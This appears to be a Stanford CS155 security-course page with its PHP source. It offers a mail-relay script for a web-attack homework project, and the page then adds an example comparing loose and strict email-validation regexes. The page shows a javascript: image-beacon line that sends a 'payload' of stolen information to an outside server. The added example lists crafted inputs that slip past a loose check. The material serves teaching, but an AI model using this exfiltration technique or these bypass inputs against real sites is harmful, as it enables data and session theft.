CS155: Computer and Network Security

CS155 Email Script

You can use this server-side script to send automated emails from client-side JavaScript. For example, clicking this client-side hyperlink will cause an email to be sent by the crypto.stanford.edu server. Another copy of the email always goes to ikhare+cs155pp3@gmail.com so that we can monitor abuse and you can receive credit for your work.

javascript:void((new Image()).src='http://crypto.stanford.edu/cs155/hw_and_proj/proj2/sendmail.php?' + 'to=youremailhere@stanford.edu' + '&payload=xyz' + '&random=' + Math.random());

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding. The void(...); construct prevents the browser from navigating to a new page consisting of the contents of the expression (which is what it normally does when it encounters a non-void expression like javascript:2+2).

Test form

If you just want to try out the script, you can use this form. (For the programming project, you'll probably want to use the JavaScript image technique shown above.)

To: (stanford e-mail address)
Payload: (the information you stole)

Source code

In case you are curious, here is the source code of this page.

<?php
  // Fall back to the placeholder values when a parameter is missing or empty.
  $to = !empty($_GET['to']) ? $_GET['to'] : "youremailhere@stanford.edu";
  $payload = !empty($_GET['payload']) ? $_GET['payload'] : "xyz";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

<link rel="stylesheet" type="text/css" href="http://crypto.stanford.edu/seclab.css" />
<title>CS155 Email Script</title>
</head>
<body>
<div id="inner-wrapper">
<div id="outer-wrapper">
<h1 id="header">
<a href="http://crypto.stanford.edu/cs155/">CS155: Computer and Network Security</a></h1>
<div id="content" class="full whitepaper">
<div class="logo">
<a href="http://crypto.stanford.edu/seclab/">
<img src="http://crypto.stanford.edu/images/seclab-128.png" alt="Logo" /></a></div>
<h1>CS155 Email Script</h1>
<p>You can use this server side script to send automated
emails from client-side JavaScript. For example, clicking this
client-side hyperlink will cause an email to be sent by the 
crypto.stanford.edu server. Another copy of the email
always goes to 
ikhare+cs155pp3@gmail.com so that we can monitor abuse and you
can receive credit for your work.</p>
    <blockquote><tt><?php 
    $link = "javascript:void((new" .
            " Image()).src=" . 
            "'http://crypto.stanford.edu/cs155/hw_and_proj/proj2/sendmail.php?'" . 
            " + 'to=$to'" .
            " + '&payload=$payload' + '&random='" . 
            " + Math.random());";
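    // HTML-escape the link before writing it into the attribute value and the link text.
    $link = htmlspecialchars($link, ENT_QUOTES);
    echo "<a href=\"$link\">$link</a>";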
    ?></tt></blockquote>
    <p>The random argument is ignored, but ensures that the browser 
bypasses its cache when downloading the image. We suggest that you use 
the random argument in your scripts as well. Newlines are not allowed 
in <tt>javascript:</tt> links; if this bothers you, try 

<a href="http://scriptasylum.com/tutorials/encdec/encode-decode.html">URL encoding</a>.
The <code>void(...);</code> construct prevents the browser from 
navigating to a new page consisting of the contents
of the expression (which is what it normally does when it encounters a 
non-void expression like <code><a href="javascript:2+2">javascript:2+2</a></code>). </p>
<h2>Test form</h2>
<p>If you just want to try out the script, you can use this form.
      (For the programming project, you'll probably
want to use the JavaScript image technique shown above.)</p>
<form method="get">
<div>
<b>To:</b> 
<input name="to" value="<?php echo htmlspecialchars($to, ENT_QUOTES); ?>" size="40" /><i>(stanford e-mail address)</i>
</div>
<div>
</div>
<div>
<b>Payload:</b>
<input name="payload" value="<?php echo htmlspecialchars($payload, ENT_QUOTES); ?>" size="40" />
<i>(the information you stole)</i>
</div>
<div>
<input type="submit" value="Send Email" name="send_submit" />

<?php
  if(!empty($_REQUEST['to'])) {
    // Literal dot and \z anchor: the value must end in exactly "@stanford.edu".
    if(!preg_match('/@stanford\.edu\z/i', $_REQUEST['to'])) {
      echo "Please use stanford e-mail address";
    } else {
      $to = "cs155pp3@gmail.com";
	  /*
		TODO: UNCOMMENT THIS REGION ONCE YOU'RE DONE GRADING
      if (!preg_match("/CS142 Grader/i", $_SERVER['HTTP_USER_AGENT']))
        $to .= ", "  . $_REQUEST['to'];
		*/
      $subject = "Message from " . $_REQUEST['to'];
      $message = "Payload:\n\n$payload";
      mail($to, $subject, $message);
      echo "<em>Sent!</em>";
    }
  }
?>
</div>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php echo htmlspecialchars(file_get_contents(__FILE__)); ?></pre>
</form>
</div>
</div>
</div>
</body>
</html>
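
The recipient check in the source above is a regular-expression suffix match on the `to` parameter. As an added example (not part of the course's script), the PHP below compares a loosely written suffix pattern with a stricter check on constructed addresses; `is_stanford_address`, `loose_check` and the sample inputs are names and values assumed here for illustration.

```php
<?php
// Added example; every input below is constructed.

// Loose suffix pattern: the unescaped '.' matches any character, and '$'
// also matches just before a trailing newline.
const LOOSE_PATTERN = '/@stanford.edu$/i';

function loose_check(string $address): bool
{
    return preg_match(LOOSE_PATTERN, $address) === 1;
}

// Stricter check (hypothetical helper): the value must be one syntactically
// valid address, and the part after the last '@' must be exactly stanford.edu.
function is_stanford_address(string $address): bool
{
    // FILTER_VALIDATE_EMAIL rejects whitespace, control characters and lists.
    if (filter_var($address, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $domain = substr($address, strrpos($address, '@') + 1);
    return strcasecmp($domain, 'stanford.edu') === 0;
}

$samples = [
    'student@stanford.edu',           // expected form
    'student@stanfordXedu',           // any character where the dot belongs
    "student@stanford.edu\n",         // trailing newline
    'a@example.com, b@stanford.edu',  // more than one address in the field
];

foreach ($samples as $address) {
    printf(
        "%-36s loose=%-3s strict=%s\n",
        json_encode($address),
        loose_check($address) ? 'yes' : 'no',
        is_stanford_address($address) ? 'yes' : 'no'
    );
}
```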